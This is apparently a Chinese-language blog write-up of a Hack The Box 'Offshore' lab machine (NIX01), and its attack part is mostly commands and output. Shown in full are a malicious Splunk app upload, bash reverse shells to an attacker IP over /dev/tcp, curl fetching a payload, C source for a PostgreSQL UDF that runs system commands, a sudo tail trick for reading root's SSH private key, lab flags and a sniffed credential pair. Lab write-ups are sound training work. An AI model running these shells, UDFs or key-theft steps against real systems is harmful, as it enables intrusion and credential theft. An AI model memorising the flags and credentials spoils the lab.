Pro-Offshore-NIX01

初始進入點，題目給的class C
1
10.10.110.0/24

IP

1 2	`10.10.10.123 172.16.1.23`

Enumeration

NMAP find open pc

Nmap scan report for 10.10.110.2
Host is up (0.20s latency).
Nmap scan report for 10.10.110.3
Host is up (0.20s latency).
Nmap scan report for 10.10.110.123
Host is up (0.20s latency).
Nmap scan report for 10.10.110.124
Host is up (0.20s latency).

NMAP Scan 10.10.110.123

PORT     STATE  SERVICE        REASON         VERSION
22/tcp   open   ssh            syn-ack ttl 62 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ed:da:93:ee:2e:2b:7a:02:4d:97:3d:1b:f2:40:ba:f6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2Dy3kztjDhz66aRIvAbMvUxDtbn5qEfkE9IjRDdlK92iRXnMR0GQIadYmaLrVe8xldeuHJv1ZYT5WAR84Csrrz9zPYldtRqrYQCEHrJtjuhs2PhwWde/zQM5E3XkwEz14MaGgipLlzP6qKjhXEPuOTXLgYs3bFQR1ylJK4TO3TLR+fL5KHp8hBm0UcgyFsAIcgJ0StEEBILpi6vz9wQKkgFKkNdI0j8uh2invCc8s6dCtgySpEVt3cERsackAmSh2UCbg5dgX27U1aiXERrnKunyq0tLxK+0ZEPUa71nmLA8AO1T3KJTF+EUsqE0egS6j32jga2CR/WBeZB8nNunB
|   256 7e:de:fa:0c:9d:4c:6c:01:7c:0a:0c:f1:74:4d:f3:5f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBjQQc098ueAsYSxV4zZw0QBUmenLsuhuEH4p5QB1bhnEDcSoKgNdXSw9055D0f3U8R7jX9Key7eu1iRzY7XnSk=
|   256 15:ab:fc:b8:a2:fa:f1:57:d7:3f:bc:ab:ad:d0:cc:99 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMw1Q1IycVY7iV1vnDakUaVy3f3ICD1UBDWR0IjlxOQt
80/tcp   open   http           syn-ack ttl 62 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: ACME Bank
8000/tcp open   http           syn-ack ttl 62 Splunkd httpd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.110.123:8000/en-US/account/login?return_to=%2Fen-US%2F
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/
|_http-favicon: Unknown favicon MD5: 28325D0DE04908D350C47DD30AE26CB2
|_http-server-header: Splunkd
8089/tcp open   ssl/http       syn-ack ttl 62 Splunkd httpd (free license; remote login disabled)
|_http-title: Site doesn't have a title (text/xml; charset=UTF-8).
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/emailAddress=support@splunk.com/localityName=San Francisco
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-02-02T20:26:16
| Not valid after:  2021-02-01T20:26:16
| MD5:   f181 50f9 e5a1 39a8 0d47 bcff 5a68 64ec
| SHA-1: b2d3 fdf6 fc1d b9de 2b8b 8f56 8601 b697 c962 4924
| -----BEGIN CERTIFICATE-----
| MIIDMjCCAhoCCQCObldSwd4kkzANBgkqhkiG9w0BAQsFADB/MQswCQYDVQQGEwJV
| UzELMAkGA1UECAwCQ0ExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xDzANBgNVBAoM
| BlNwbHVuazEXMBUGA1UEAwwOU3BsdW5rQ29tbW9uQ0ExITAfBgkqhkiG9w0BCQEW
| EnN1cHBvcnRAc3BsdW5rLmNvbTAeFw0xODAyMDIyMDI2MTZaFw0yMTAyMDEyMDI2
| MTZaMDcxIDAeBgNVBAMMF1NwbHVua1NlcnZlckRlZmF1bHRDZXJ0MRMwEQYDVQQK
| DApTcGx1bmtVc2VyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvpvJ
| RbGYob3S1ydFKnZ7/nM92lUPBorlFIfFaqf/eTTeaZParWB1LJUvcF7gppgoUW8J
| 1cnDvaIz50USmjFQl16g3k8p+4ghqs1fW7eoEduyy4ryNhUG5t4WN7V/Dp0mCz46
| N/56WyT7GXGVr04/X8kTx8OPYj5rUUHHN4Vsn7PKkxlfTbYZ9KRtMmbNNJYljk2n
| +BnvV+SSY31BMK/05QRVyECwzmqow+OnbnZst05d9BJK+DasIJDUmIJ4htqjB1Ke
| h3v6WUtzSh4B++awHnBFpDkhVj7M++lkabO/BZSyTE2jXcwwrjwrc9arUU6E0aOn
| 62Win/PqkieGaJb3WQIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQDL+zEDoCAcHY2l
| p0q4yaPdbJZIltDvHjb6zfvVrFM7+tTQvRqWA9AmQT9oQzm86RJnd5b2IHdrW9h/
| RJlK3nZ0xe0VVdspiwf+eD2VPlBKnGmxEoE2A99nwDcg0UQ8q0Ink4RKbNcV5YaJ
| 7UdLIDPMbOkxzzrvGMeuH9fTWrA0ZPnDxgH2RfcOZY08NtxWLtBcwboy3zg7F2Sw
| 6KTNhfHfYm82WbLxjx3+HxFSk9zCP+1Tg/HqyY5kMTvMxLTRzmoT6IUdQhb2kGwj
| q4ZmSQ7X49S3rJkPe++Qivyd/xFFUFFCFPmWZEPx9sjyQOHlTvL3/lFR4LFY24iu
| yVhAI9dJ
|_-----END CERTIFICATE-----
|_http-server-header: Splunkd
8191/tcp closed limnerpressure reset ttl 62
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Recon

8000/tcp

訪問後查看About，得知版本為7.0.2

GetShell

popping-shells-on-splunk

1	`https://github.com/TBGSecurity/splunk_shells`

透過manage app上傳包，並且重啟系統，再利用search反連
1
| revshell std 10.10.15.74 4444
msfconsole exploit -j

提權

Get TTyShell

1 2	`/bin/bash -c "bash -i >& /dev/tcp/10.10.15.74/443 0>&1" python3 -c "import pty;pty.spawn('/bin/bash')"`

netstat

tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:8089            0.0.0.0:*               LISTEN      16645/splunkd   
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      16645/splunkd   
tcp        0      0 127.0.0.1:8065          0.0.0.0:*               LISTEN      16736/python    
tcp        0      0 172.16.1.23:8000        10.10.16.112:53290      TIME_WAIT   -

發現有psql數據庫，但執行psql會發生錯誤

1 2	`利用find找尋psql檔案 find / -iname "psql" 2>/dev/null`

psql登入本地

1 2	`直接psql會跳mark not exist /usr/local/pgsql/bin/psql --username postgres`

查看數據庫版本

1	`PostgreSQL 9.6.0 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.9) 5.4.0 20160609, 64-bit`

本地安裝psql 9.6-dev並編譯pg_exec

https://packages.debian.org/stretch/amd64/postgresql-server-dev-9.6/download

/etc/apt/source.list 新增
deb http://security.debian.org/debian-security stretch/updates main 

wget http://security.debian.org/debian-security/pool/updates/main/p/postgresql-9.6/postgresql-server-dev-9.6_9.6.24-0+deb9u1_amd64.deb

apt install <package>

刪除所有舊版psql
sudo apt-get --purge remove postgresql
dpkg -l | grep postgres
apt-get --purge remove packagename1 packagename2 ..
pg_config

編譯pg_exec

//gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c
#include <string.h>
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

PG_FUNCTION_INFO_V1(pg_exec);
Datum pg_exec(PG_FUNCTION_ARGS) {
    char* command = PG_GETARG_CSTRING(0);
    PG_RETURN_INT32(system(command));
}

訪問psql並getshell

#將檔案傳至受害端/tmp底下
curl http://10.10.15.74:1234/pg_exec.so -o pg_exec.so

CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE C STRICT;

SELECT sys('bash -c "bash -i >& /dev/tcp/10.10.15.74/4455 0>&1"');

nc 監聽4455
1
nc -lvnp 4455

1	`成功獲得postgres 使用者的shell`

sudo -l

https://gtfobins.github.io/gtfobins/tail/#sudo
運用tail查看root的id_rsa

LFILE=/root/.ssh/id_rsa
sudo tail -c1G "$LFILE"

id_rsa

利用ssh給privateKey連線
1
ssh -i id_rsa root@10.10.110.123

FLAG

root@NIX01:~# cat /home/mark/flag.txt
OFFSHORE{b3h0ld_th3_P0w3r_0f_$plunk}

root@NIX01:~# cat /root/flag.txt
OFFSHORE{st0p_tai1ing_m3_br0}

root@NIX01:~# cat /var/lib/postgresql/flag.txt
OFFSHORE{fun_w1th_m@g1k_bl0ck$}

後滲透

tcpdump 錄封包
1
tcpdump -i eth0 -vv -w test.pcap

利用scp將檔案拉回kali

1	`scp -i id_rsa root@10.10.110.123:/tmp/test.pcap .`

wireshrak查看封包內容，發現一組帳密
1
2
admin Zaq12wsx!

FLAG

1 2	`#wireshark OFFSHORE{l0v3_cl3artext_pr0toc0l$}`

寫個ping腳本掃描內網

# ping.sh

#!/bin/bash

if [ "$1" == "" ]
	then
		echo "./ip.sh 192.168.1"
	else
		for ip in `seq 1 254`; do
			ping -c 1 -w 1 $1.$ip |grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
		done
fi

HTB > Offshore

#splunk #postgresql #psql UDF #tail #tcpdump #ping script

Pro-Offshore-NIX01

https://0xbe61a55f.github.io/2022/12/29/Pro-Offshore-NIX01/

作者

Giwawa

發布於

2022年12月29日

許可協議

WEB-ST2022-Week1 下一篇